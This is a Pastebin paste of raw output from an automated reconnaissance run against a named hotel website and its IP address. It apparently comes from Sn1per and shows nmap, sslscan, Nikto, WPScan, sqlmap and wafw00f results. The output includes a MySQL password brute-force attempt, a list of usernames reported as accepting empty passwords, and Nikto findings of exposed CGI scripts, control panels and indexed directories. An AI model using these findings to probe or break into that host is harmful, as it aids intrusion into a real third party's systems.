  1732. |       TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 2048) - A
  1733. |       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (dh 256) - A
  1734. |       TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 128) - C
  1735. |       TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 128) - C
  1736. |       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
  1737. |       TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 2048) - A
  1738. |       TLS_DHE_RSA_WITH_SEED_CBC_SHA (dh 128) - C
  1739. |       TLS_RSA_WITH_SEED_CBC_SHA (rsa 2048) - A
  1740. |       TLS_RSA_WITH_IDEA_CBC_SHA (rsa 2048) - A
  1741. |       TLS_ECDHE_RSA_WITH_RC4_128_SHA (dh 256) - A
  1742. |       TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - A
  1743. |     compressors:
  1744. |       NULL
  1745. |     cipher preference: server
  1746. |     warnings:
  1747. |       Key exchange parameters of lower strength than certificate key
  1748. |       Weak cipher RC4 in TLSv1.1 or newer not needed for BEAST mitigation
  1749. |   TLSv1.2:
  1750. |     ciphers:
  1751. |       TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (dh 256) - A
  1752. |       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (dh 256) - A
  1753. |       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (dh 256) - A
  1754. |       TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (dh 128) - B
  1755. |       TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 (dh 128) - B
  1756. |       TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 128) - B
  1757. |       TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 128) - B
  1758. |       TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 2048) - A
  1759. |       TLS_RSA_WITH_AES_256_CBC_SHA256 (rsa 2048) - A
  1760. |       TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A
  1761. |       TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 2048) - A
  1762. |       TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (dh 256) - A
  1763. |       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (dh 256) - A
  1764. |       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (dh 256) - A
  1765. |       TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (dh 128) - C
  1766. |       TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 (dh 128) - C
  1767. |       TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 128) - C
  1768. |       TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 128) - C
  1769. |       TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 2048) - A
  1770. |       TLS_RSA_WITH_AES_128_CBC_SHA256 (rsa 2048) - A
  1771. |       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
  1772. |       TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 2048) - A
  1773. |       TLS_DHE_RSA_WITH_SEED_CBC_SHA (dh 128) - C
  1774. |       TLS_RSA_WITH_SEED_CBC_SHA (rsa 2048) - A
  1775. |       TLS_RSA_WITH_IDEA_CBC_SHA (rsa 2048) - A
  1776. |       TLS_ECDHE_RSA_WITH_RC4_128_SHA (dh 256) - A
  1777. |       TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - A
  1778. |     compressors:
  1779. |       NULL
  1780. |     cipher preference: server
  1781. |     warnings:
  1782. |       Key exchange parameters of lower strength than certificate key
  1783. |       Weak cipher RC4 in TLSv1.1 or newer not needed for BEAST mitigation
  1784. |_  least strength: C
  1785. | ssl-google-cert-catalog:
  1786. |_  No DB entry
  1787.  
  1788. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1789. Nmap done: 1 IP address (1 host up) scanned in 2059.30 seconds
  1790.  
  1791.                                  ^     ^
  1792.         _   __  _   ____ _   __  _    _   ____
  1793.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1794.       | V V // o // _/ | V V // 0 // 0 // _/  
  1795.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/    
  1796.                                 <  
  1797.                                  ...'
  1798.                                  
  1799.     WAFW00F - Web Application Firewall Detection Tool
  1800.    
  1801.     By Sandro Gauci && Wendel G. Henrique
  1802.  
  1803. Checking https://www.lasdunashotel.com
  1804. Traceback (most recent call last):
  1805.   File "/usr/bin/wafw00f", line 695, in <module>
  1806.     main()
  1807.   File "/usr/bin/wafw00f", line 665, in main
  1808.     if attacker.normalrequest() is None:
  1809.   File "/usr/bin/wafw00f", line 90, in normalrequest
  1810.     return self.request(usecache=usecache,cacheresponse=cacheresponse,headers=headers)
  1811.   File "/usr/share/waffit/libs/evillib.py", line 294, in request
  1812.     h.request(method,path,headers=headers)
  1813.   File "/usr/lib/python2.7/httplib.py", line 1001, in request
  1814.     self._send_request(method, url, body, headers)
  1815.   File "/usr/lib/python2.7/httplib.py", line 1035, in _send_request
  1816.     self.endheaders(body)
  1817.   File "/usr/lib/python2.7/httplib.py", line 997, in endheaders
  1818.     self._send_output(message_body)
  1819.   File "/usr/lib/python2.7/httplib.py", line 850, in _send_output
  1820.     self.send(msg)
  1821.   File "/usr/lib/python2.7/httplib.py", line 812, in send
  1822.     self.connect()
  1823.   File "/usr/lib/python2.7/httplib.py", line 1212, in connect
  1824.     server_hostname=server_hostname)
  1825.   File "/usr/lib/python2.7/ssl.py", line 350, in wrap_socket
  1826.     _context=self)
  1827.   File "/usr/lib/python2.7/ssl.py", line 566, in __init__
  1828.     self.do_handshake()
  1829.   File "/usr/lib/python2.7/ssl.py", line 796, in do_handshake
  1830.     match_hostname(self.getpeercert(), self.server_hostname)
  1831.   File "/usr/lib/python2.7/ssl.py", line 269, in match_hostname
  1832.     % (hostname, ', '.join(map(repr, dnsnames))))
  1833. ssl.CertificateError: hostname 'www.lasdunashotel.com' doesn't match either of '*.websitewelcome.com', 'websitewelcome.com'
  1834.  
  1835. https://www.lasdunashotel.com [302] Apache, Country[UNITED STATES][US], HTTPServer[Apache], IP[192.185.26.214], RedirectLocation[/404.html]
  1836. https://www.lasdunashotel.com/404.html [200] Apache, Country[UNITED STATES][US], HTTPServer[Apache], IP[192.185.26.214], JQuery[1.9.1], Script[text/javascript], Title[404 - PAGE NOT FOUND]
  1837.  
  1838. + -- --=[Checking if X-Content options are enabled on www.lasdunashotel.com...
  1839.  
  1840. + -- --=[Checking if X-Frame options are enabled on www.lasdunashotel.com...
  1841.  
  1842. + -- --=[Checking if X-XSS-Protection header is enabled on www.lasdunashotel.com...
  1843.  
  1844. + -- --=[Checking HTTP methods on www.lasdunashotel.com...
  1845.  
  1846. + -- --=[Checking if TRACE method is enabled on www.lasdunashotel.com...
  1847.  
  1848. + -- --=[Checking for open proxy on www.lasdunashotel.com...
  1849.  
  1850. + -- --=[Enumerating software on www.lasdunashotel.com...
  1851. Server: Apache
  1852.  
  1853. + -- --=[Checking if Strict-Transport-Security is enabled on www.lasdunashotel.com...
  1854.  
  1855. + -- --=[Checking for Flash cross-domain policy on www.lasdunashotel.com...
  1856.  
  1857. + -- --=[Checking for Silverlight cross-domain policy on www.lasdunashotel.com...
  1858.  
  1859. + -- --=[Checking for HTML5 cross-origin resource sharing on www.lasdunashotel.com...
  1860.  
  1861. + -- --=[Retrieving robots.txt on www.lasdunashotel.com...
  1862.  
  1863. + -- --=[Retrieving sitemap.xml on www.lasdunashotel.com...
  1864.  
  1865. + -- --=[Checking cookie attributes on www.lasdunashotel.com...
  1866.  
  1867. Version: 1.10.5-static
  1868. OpenSSL 1.0.2e-dev xx XXX xxxx
  1869.  
  1870. Testing SSL server www.lasdunashotel.com on port 443
  1871.  
  1872.   TLS renegotiation:
  1873. Secure session renegotiation supported
  1874.  
  1875.   TLS Compression:
  1876. Compression disabled
  1877.  
  1878.   Heartbleed:
  1879. TLS 1.0 not vulnerable to heartbleed
  1880. TLS 1.1 not vulnerable to heartbleed
  1881. TLS 1.2 not vulnerable to heartbleed
  1882.  
  1883.   Supported Server Cipher(s):
  1884. Accepted  TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  1885. Accepted  TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 1024 bits
  1886. Accepted  TLSv1.0  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 1024 bits
  1887. Accepted  TLSv1.0  256 bits  AES256-SHA                  
  1888. Accepted  TLSv1.0  256 bits  CAMELLIA256-SHA              
  1889. Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  1890. Accepted  TLSv1.0  128 bits  DHE-RSA-AES128-SHA            DHE 1024 bits
  1891. Accepted  TLSv1.0  128 bits  DHE-RSA-SEED-SHA              DHE 1024 bits
  1892. Accepted  TLSv1.0  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 1024 bits
  1893. Accepted  TLSv1.0  128 bits  AES128-SHA                  
  1894. Accepted  TLSv1.0  128 bits  SEED-SHA                    
  1895. Accepted  TLSv1.0  128 bits  CAMELLIA128-SHA              
  1896. Accepted  TLSv1.0  128 bits  IDEA-CBC-SHA                
  1897. Accepted  TLSv1.0  128 bits  ECDHE-RSA-RC4-SHA             Curve P-256 DHE 256
  1898. Accepted  TLSv1.0  128 bits  RC4-SHA                      
  1899. Accepted  TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  1900. Accepted  TLSv1.1  256 bits  DHE-RSA-AES256-SHA            DHE 1024 bits
  1901. Accepted  TLSv1.1  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 1024 bits
  1902. Accepted  TLSv1.1  256 bits  AES256-SHA                  
  1903. Accepted  TLSv1.1  256 bits  CAMELLIA256-SHA              
  1904. Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  1905. Accepted  TLSv1.1  128 bits  DHE-RSA-AES128-SHA            DHE 1024 bits
  1906. Accepted  TLSv1.1  128 bits  DHE-RSA-SEED-SHA              DHE 1024 bits
  1907. Accepted  TLSv1.1  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 1024 bits
  1908. Accepted  TLSv1.1  128 bits  AES128-SHA                  
  1909. Accepted  TLSv1.1  128 bits  SEED-SHA                    
  1910. Accepted  TLSv1.1  128 bits  CAMELLIA128-SHA              
  1911. Accepted  TLSv1.1  128 bits  IDEA-CBC-SHA                
  1912. Accepted  TLSv1.1  128 bits  ECDHE-RSA-RC4-SHA             Curve P-256 DHE 256
  1913. Accepted  TLSv1.1  128 bits  RC4-SHA                      
  1914. Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
  1915. Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
  1916. Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  1917. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-GCM-SHA384     DHE 1024 bits
  1918. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA256         DHE 1024 bits
  1919. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA            DHE 1024 bits
  1920. Accepted  TLSv1.2  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 1024 bits
  1921. Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384            
  1922. Accepted  TLSv1.2  256 bits  AES256-SHA256                
  1923. Accepted  TLSv1.2  256 bits  AES256-SHA                  
  1924. Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA              
  1925. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
  1926. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
  1927. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  1928. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-GCM-SHA256     DHE 1024 bits
  1929. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA256         DHE 1024 bits
  1930. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA            DHE 1024 bits
  1931. Accepted  TLSv1.2  128 bits  DHE-RSA-SEED-SHA              DHE 1024 bits
  1932. Accepted  TLSv1.2  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 1024 bits
  1933. Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256            
  1934. Accepted  TLSv1.2  128 bits  AES128-SHA256                
  1935. Accepted  TLSv1.2  128 bits  AES128-SHA                  
  1936. Accepted  TLSv1.2  128 bits  SEED-SHA                    
  1937. Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA              
  1938. Accepted  TLSv1.2  128 bits  IDEA-CBC-SHA                
  1939. Accepted  TLSv1.2  128 bits  ECDHE-RSA-RC4-SHA             Curve P-256 DHE 256
  1940. Accepted  TLSv1.2  128 bits  RC4-SHA                      
  1941.  
  1942.   Preferred Server Cipher(s):
  1943. TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  1944. TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  1945. TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
  1946.  
  1947.   SSL Certificate:
  1948. Signature Algorithm: sha256WithRSAEncryption
  1949. RSA Key Strength:    2048
  1950.  
  1951. Subject:  *.websitewelcome.com
  1952. Altnames: DNS:*.websitewelcome.com, DNS:websitewelcome.com
  1953. Issuer:   COMODO RSA Domain Validation Secure Server CA
  1954.  
  1955. - Nikto v2.1.6
  1956. ---------------------------------------------------------------------------
  1957. + Target IP:          192.185.26.214
  1958. + Target Hostname:    www.lasdunashotel.com
  1959. + Target Port:        443
  1960. ---------------------------------------------------------------------------
  1961. + SSL Info:        Subject:  /OU=Domain Control Validated/OU=Hosted by HostGator.com, LLC./OU=PositiveSSL Wildcard/CN=*.websitewelcome.com
  1962.                    Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
  1963.                    Issuer:   /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO RSA Domain Validation Secure Server CA
  1964. + Start Time:         2015-09-29 14:39:26 (GMT-4)
  1965. ---------------------------------------------------------------------------
  1966. + Server: Apache
  1967. + The anti-clickjacking X-Frame-Options header is not present.
  1968. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  1969. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  1970. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  1971. + Root page / redirects to: /404.html
  1972. + Server is using a wildcard certificate: *.websitewelcome.com
  1973. + Hostname 'www.lasdunashotel.com' does not match certificate's names: *.websitewelcome.com
  1974. + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
  1975. + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: : Argumento inválido
  1976. + Scan terminated:  7 error(s) and 7 item(s) reported on remote host
  1977. + End Time:           2015-09-29 15:05:09 (GMT-4) (1543 seconds)
  1978. ---------------------------------------------------------------------------
  1979. + 1 host(s) tested
  1980. _______________________________________________________________
  1981.         __          _______   _____                  
  1982.         \ \        / /  __ \ / ____|                
  1983.          \ \  /\  / /| |__) | (___   ___  __ _ _ __  
  1984.           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
  1985.            \  /\  /  | |     ____) | (__| (_| | | | |
  1986.             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
  1987.  
  1988.         WordPress Security Scanner by the WPScan Team
  1989.                        Version 2.8
  1990.           Sponsored by Sucuri - https://sucuri.net
  1991.    @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
  1992. _______________________________________________________________
  1993.  
  1994.  
  1995. [!] The WordPress URL supplied 'https://www.lasdunashotel.com/' seems to be down.
  1996. [ERROR] Website Unreachable: https://www.lasdunashotel.com
  1997.          _
  1998.  ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150928}
  1999. |_ -| . | |     | .'| . |
  2000. |___|_  |_|_|_|_|__,|  _|
  2001.       |_|           |_|   http://sqlmap.org
  2002.  
  2003. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  2004.  
  2005. [*] starting at 15:05:42
  2006.  
  2007. do you want to check for the existence of site's sitemap(.xml) [y/N] n
  2008. [15:05:42] [INFO] starting crawler
  2009. [15:05:42] [INFO] searching for links with depth 1
  2010. sqlmap got a 302 redirect to 'https://www.lasdunashotel.com:443/404.html'. Do you want to follow? [Y/n] Y
  2011. [15:05:44] [INFO] heuristics detected web page charset 'ISO-8859-2'
  2012. [15:05:44] [INFO] searching for links with depth 2                                                                                                  
  2013. please enter number of threads? [Enter for 1 (current)] 1
  2014. [15:05:44] [WARNING] running in a single-thread mode. This could take a while
  2015. [15:05:46] [INFO] searching for links with depth 3                                                                                                  
  2016. please enter number of threads? [Enter for 1 (current)] 1
  2017. [15:05:46] [WARNING] running in a single-thread mode. This could take a while
  2018. [15:05:46] [INFO] searching for links with depth 4                                                                                                  
  2019. please enter number of threads? [Enter for 1 (current)] 1
  2020. [15:05:46] [WARNING] running in a single-thread mode. This could take a while
  2021. [15:05:46] [INFO] searching for links with depth 5                                                                                                  
  2022. please enter number of threads? [Enter for 1 (current)] 1
  2023. [15:05:46] [WARNING] running in a single-thread mode. This could take a while
  2024. [15:05:46] [WARNING] no usable links found (with GET parameters)                                                                                    
  2025.  
  2026. [*] shutting down at 15:05:46
  2027.  
  2028. + -- --=[Port 445 closed... skipping.
  2029. + -- --=[Port 512 closed... skipping.
  2030. + -- --=[Port 513 closed... skipping.
  2031. + -- --=[Port 514 closed... skipping.
  2032. + -- --=[Port 514 closed... skipping.
  2033. + -- --=[Port 2121 closed... skipping.
  2034. + -- --=[Port 3306 opened... running tests...
  2035.  
  2036. Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 15:05 EDT
  2037. Nmap scan report for www.lasdunashotel.com (192.185.26.214)
  2038. Host is up (0.017s latency).
  2039. rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
  2040. PORT     STATE SERVICE VERSION
  2041. 3306/tcp open  mysql   MySQL 5.5.42-37.1
  2042. | mysql-audit:
  2043. |_  No audit rulebase file was supplied (see mysql-audit.filename)
  2044. | mysql-brute:
  2045. |   Accounts: No valid accounts found
  2046. |   Statistics: Performed 81 guesses in 71 seconds, average tps: 1
  2047. |_  ERROR: Too many retries, aborted ...
  2048. | mysql-enum:
  2049. |   Valid usernames:
  2050. |     root:<empty> - Valid credentials
  2051. |     netadmin:<empty> - Valid credentials
  2052. |     guest:<empty> - Valid credentials
  2053. |     user:<empty> - Valid credentials
  2054. |     web:<empty> - Valid credentials
  2055. |     sysadmin:<empty> - Valid credentials
  2056. |     administrator:<empty> - Valid credentials
  2057. |     webadmin:<empty> - Valid credentials
  2058. |     admin:<empty> - Valid credentials
  2059. |     test:<empty> - Valid credentials
  2060. |_  Statistics: Performed 10 guesses in 69 seconds, average tps: 0
  2061. | mysql-info:
  2062. |   Protocol: 53
  2063. |   Version: .5.42-37.1
  2064. |   Thread ID: 17373659
  2065. |   Capabilities flags: 65535
  2066. |   Some Capabilities: ConnectWithDatabase, LongPassword, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolOld, SupportsTransactions, FoundRows, SwitchToSSLAfterHandshake, Support41Auth, IgnoreSigpipes, SupportsLoadDataLocal, ODBCClient, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag, DontAllowDatabaseTableColumn
  2067. |   Status: Autocommit
  2068. |_  Salt: h.Ic:7D0c##%0bzaXtaf
  2069. |_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
  2070.  
  2071. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2072. Nmap done: 1 IP address (1 host up) scanned in 74.74 seconds
  2073. + -- --=[Port 3389 closed... skipping.
  2074. + -- --=[Port 5432 closed... skipping.
  2075. + -- --=[Port 5800 closed... skipping.
  2076. + -- --=[Port 5900 closed... skipping.
  2077. + -- --=[Port 6000 closed... skipping.
  2078. + -- --=[Port 6667 closed... skipping.
  2079. + -- --=[Port 8000 closed... skipping.
  2080. + -- --=[Port 8100 closed... skipping.
  2081. + -- --=[Port 8080 opened... running tests...
  2082.  
  2083.                                  ^     ^
  2084.         _   __  _   ____ _   __  _    _   ____
  2085.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  2086.       | V V // o // _/ | V V // 0 // 0 // _/  
  2087.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/    
  2088.                                 <  
  2089.                                  ...'
  2090.                                  
  2091.     WAFW00F - Web Application Firewall Detection Tool
  2092.    
  2093.     By Sandro Gauci && Wendel G. Henrique
  2094.  
  2095. Checking http://www.lasdunashotel.com:8080
  2096. Generic Detection results:
  2097. The site http://www.lasdunashotel.com:8080 seems to be behind a WAF
  2098. Reason: The server returned a different response code when a string trigged the blacklist.
  2099. Normal response code is "302", while the response code to an attack is "406"
  2100. Number of requests: 10
  2101.  
  2102. http://www.lasdunashotel.com:8080 [200] Country[UNITED STATES][US], HTTPServer[nginx/1.8.0], IP[192.185.26.214], nginx[1.8.0]
  2103.  
  2104. ./sniper: línea 483: xsstracer: no se encontró la orden
  2105. - Nikto v2.1.6
  2106. ---------------------------------------------------------------------------
  2107. + Target IP:          192.185.26.214
  2108. + Target Hostname:    www.lasdunashotel.com
  2109. + Target Port:        8080
  2110. + Start Time:         2015-09-29 15:08:07 (GMT-4)
  2111. ---------------------------------------------------------------------------
  2112. + Server: nginx/1.8.0
  2113. + The anti-clickjacking X-Frame-Options header is not present.
  2114. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  2115. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  2116. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
  2117. + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
  2118. + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
  2119. + /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
  2120. + /securecontrolpanel/: Web Server Control Panel
  2121. + /webmail/: Web based mail package installed.
  2122. + /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
  2123. + OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
  2124. + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
  2125. + OSVDB-2117: /cpanel/: Web-based control panel
  2126. + OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
  2127. + OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
  2128. + OSVDB-3268: /includes/: Directory indexing found.
  2129. + OSVDB-3092: /includes/: This might be interesting...
  2130. + OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
  2131. + OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
  2132. + OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
  2133. + OSVDB-3268: /images/: Directory indexing found.
  2134. + OSVDB-3268: /style/: Directory indexing found.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top